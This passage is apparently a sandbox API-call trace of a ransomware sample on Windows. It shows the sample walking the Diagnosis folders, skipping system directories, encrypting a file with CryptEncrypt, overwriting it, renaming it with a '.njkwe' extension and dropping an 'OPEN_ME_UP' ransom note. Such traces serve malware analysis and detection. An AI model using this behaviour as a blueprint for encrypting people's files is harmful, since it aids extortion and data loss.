lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.064] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb85cc8d2, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xb85cc8d2, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.064] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.064] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.064] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.064] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.064] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.064] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\..") returned 41 [0073.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.064] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.064] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.064] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.064] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.064] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\.." (normalized: "c:\\programdata\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.064] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d545, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AsimovUploader", cAlternateFileName="ASIMOV~1")) returned 1 [0073.064] lstrcmpiW (lpString1="AsimovUploader", lpString2="Windows") returned -1 [0073.064] lstrcmpiW (lpString1="AsimovUploader", lpString2="$Recycle.bin") returned 1 [0073.064] lstrcmpiW (lpString1="AsimovUploader", lpString2="System Volume Information") returned -1 [0073.064] lstrcmpiW (lpString1="AsimovUploader", lpString2="Program Files") returned -1 [0073.064] lstrcmpiW (lpString1="AsimovUploader", lpString2="Program Files (x86)") returned -1 [0073.064] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader") returned 53 [0073.064] lstrcmpW (lpString1="AsimovUploader", lpString2=".") returned 1 [0073.064] lstrcmpW (lpString1="AsimovUploader", lpString2="..") returned 1 [0073.064] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.064] GetProcessHeap () returned 0xbe0000 [0073.064] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.064] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\*") returned 55 [0073.064] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d545, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19c60 [0073.065] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.065] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.065] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.065] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.065] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.065] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\.") returned 55 [0073.065] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.065] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.065] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.065] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.065] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.065] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\asimovuploader\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.065] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d545, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.065] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.065] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.065] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.065] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.065] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.065] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\..") returned 56 [0073.065] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.065] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.065] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.065] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.065] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.065] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.065] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.065] FindNextFileW (in: hFindFile=0xc19c60, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d545, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.066] FindClose (in: hFindFile=0xc19c60 | out: hFindFile=0xc19c60) returned 1 [0073.066] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 85 [0073.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\AsimovUploader\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\asimovuploader\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.157] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.157] CloseHandle (hObject=0x430) returned 1 [0073.158] GetProcessHeap () returned 0xbe0000 [0073.158] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.158] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d9a4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a88b65e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DownloadedScenarios", cAlternateFileName="DOWNLO~1")) returned 1 [0073.158] lstrcmpiW (lpString1="DownloadedScenarios", lpString2="Windows") returned -1 [0073.158] lstrcmpiW (lpString1="DownloadedScenarios", lpString2="$Recycle.bin") returned 1 [0073.158] lstrcmpiW (lpString1="DownloadedScenarios", lpString2="System Volume Information") returned -1 [0073.158] lstrcmpiW (lpString1="DownloadedScenarios", lpString2="Program Files") returned -1 [0073.158] lstrcmpiW (lpString1="DownloadedScenarios", lpString2="Program Files (x86)") returned -1 [0073.158] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios") returned 58 [0073.158] lstrcmpW (lpString1="DownloadedScenarios", lpString2=".") returned 1 [0073.158] lstrcmpW (lpString1="DownloadedScenarios", lpString2="..") returned 1 [0073.158] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.158] GetProcessHeap () returned 0xbe0000 [0073.158] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.158] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\*") returned 60 [0073.158] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d9a4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a88b65e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a360 [0073.158] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.158] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.158] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.158] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.158] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.158] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\.") returned 60 [0073.158] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.158] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.158] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.158] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.158] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.159] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.159] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69d9a4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a88b65e, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.159] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.159] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.159] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.159] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.159] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.159] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\..") returned 61 [0073.159] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.159] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.159] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.159] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.159] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.159] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.159] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.159] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a88b65e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="windows.uif_ondemand.xml.inbox", cAlternateFileName="WINDOW~1.INB")) returned 1 [0073.159] lstrcmpiW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="Windows") returned 1 [0073.159] lstrcmpiW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="$Recycle.bin") returned 1 [0073.159] lstrcmpiW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="System Volume Information") returned 1 [0073.159] lstrcmpiW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="Program Files") returned 1 [0073.159] lstrcmpiW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="Program Files (x86)") returned 1 [0073.159] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\windows.uif_ondemand.xml.inbox") returned 89 [0073.159] StrStrIW (lpFirst="windows.uif_ondemand.xml.inbox", lpSrch=".njkwe") returned 0x0 [0073.159] lstrcmpW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.159] lstrcmpW (lpString1="windows.uif_ondemand.xml.inbox", lpString2="taridd") returned 1 [0073.159] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\windows.uif_ondemand.xml.inbox", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.159] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\windows.uif_ondemand.xml.inbox" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif_ondemand.xml.inbox"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.208] GetTickCount () returned 0x1152a97 [0073.208] GetTickCount () returned 0x1152a97 [0073.208] GetTickCount () returned 0x1152a97 [0073.208] GetTickCount () returned 0x1152a97 [0073.209] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0073.209] GetProcessHeap () returned 0xbe0000 [0073.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0073.209] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x9d0, lpOverlapped=0x0) returned 1 [0073.211] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff630, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.211] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x9d0, lpOverlapped=0x0) returned 1 [0073.211] GetProcessHeap () returned 0xbe0000 [0073.211] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0073.211] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0073.211] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0073.211] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0073.211] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0073.211] CloseHandle (hObject=0x434) returned 1 [0073.211] GetProcessHeap () returned 0xbe0000 [0073.211] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.211] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\windows.uif_ondemand.xml.inbox_r00t_{3sXlE5}.njkwe") returned 109 [0073.211] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\windows.uif_ondemand.xml.inbox" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif_ondemand.xml.inbox"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\windows.uif_ondemand.xml.inbox_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\windows.uif_ondemand.xml.inbox_r00t_{3sxle5}.njkwe")) returned 1 [0073.212] GetProcessHeap () returned 0xbe0000 [0073.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.212] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a88b65e, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5eab1ff, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5eab1ff, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x9d0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="windows.uif_ondemand.xml.inbox", cAlternateFileName="WINDOW~1.INB")) returned 0 [0073.212] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0073.212] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 90 [0073.212] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedScenarios\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\downloadedscenarios\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.214] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.215] CloseHandle (hObject=0x430) returned 1 [0073.215] GetProcessHeap () returned 0xbe0000 [0073.215] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.215] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4d8e7d9f, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4d8e7d9f, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DownloadedSettings", cAlternateFileName="DOWNLO~2")) returned 1 [0073.215] lstrcmpiW (lpString1="DownloadedSettings", lpString2="Windows") returned -1 [0073.215] lstrcmpiW (lpString1="DownloadedSettings", lpString2="$Recycle.bin") returned 1 [0073.215] lstrcmpiW (lpString1="DownloadedSettings", lpString2="System Volume Information") returned -1 [0073.215] lstrcmpiW (lpString1="DownloadedSettings", lpString2="Program Files") returned -1 [0073.215] lstrcmpiW (lpString1="DownloadedSettings", lpString2="Program Files (x86)") returned -1 [0073.215] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings") returned 57 [0073.215] lstrcmpW (lpString1="DownloadedSettings", lpString2=".") returned 1 [0073.215] lstrcmpW (lpString1="DownloadedSettings", lpString2="..") returned 1 [0073.215] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.215] GetProcessHeap () returned 0xbe0000 [0073.215] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0073.215] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\*") returned 59 [0073.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x4d8e7d9f, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0x4d8e7d9f, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0073.217] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.217] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.217] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.217] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.217] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.217] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\DownloadedSettings\\.") returned 59 [0073.217] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.217] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.217] lstrcmpW (lpString1=".", 